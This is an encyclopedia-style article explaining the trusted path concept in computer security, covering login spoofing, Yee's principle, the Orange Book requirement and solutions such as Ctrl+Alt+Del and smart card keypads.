Trusted path

A trusted path is simply some mechanism that provides confidence that the user is communicating with what the user intended to communicate with, ensuring that attackers can't intercept or modify whatever information is being communicated.

As such it is the counterpart to needing trustworthy channels in that it assures users that they really are working with the program or system they intended to use.

The traditional example is a 'fake login' program (e.g.: a program is written to look like the login screen of a system, as in Login spoofing). When users try to log in, the fake login program can then capture user passwords for later use.

According to Yee, Ka-Ping. "User Interaction Design for Secure Systems". http://people.ischool.berkeley.edu/~ping/sid/uidss.pdf. 

Principle of the Trusted Path. The most important input and output channels are those used to manipulate authorities; if these channels can be spoofed or corrupted, the system has a security vulnerability. Hence the principle of the trusted path: the user must have an unspoofable and incorruptible channel to any entity trusted to manipulate authorities on the user's behalf. The authority-manipulating entity could be a number of different things, depending on the domain. In an operating system, the authority-manipulating entities would be the operating system and user interface components for handling authorities. Microsoft Windows, for example, provides a trusted path to its login window by requiring the user to press Ctrl+Alt+Del. This key sequence causes a non-maskable interrupt that can only be intercepted by the operating system, thus guaranteeing that the login window cannot be spoofed by any application. This issue also needs to be addressed in any language system for running untrusted code, such as Java.

Examples of Problems of Untrusted Paths

• As mentioned above, if the login prompt is spoofed, or if the channel is merely eavesdropped, the user's password can be acquired.
• If you hand your credit card to a dishonest waiter when paying a restaurant bill, there is a risk that your credit card details may be copied, and subsequently used for fraudulent transactions.
• If your postal mail is delivered to via an insecure mailbox, an identity thief may be able to learn information about you.
• If you type in a command to a shell, command prompt, or any other system, there may be some other process on the computer that can monitor and/or insert keystrokes.

History

An early reference to a trusted path is from the Orange Book:

3.2.2.1.1 Trusted Path

The TCB shall support a trusted communication path between itself and user for initial login and authentication. Communications via this path shall be initiated exclusively by a user.

Solutions

There have been different approaches to building trusted paths. Some are implemented purely in software, and we need to believe that the software is correct. The famous Ctrl-Alt-Del sequence is not purely implemented in software, but there is no hardware indication to the user that the secure software is activated.

Some smart card readers also have keypads that mean the PIN need not be entered on the untrustworthy PC keyboard.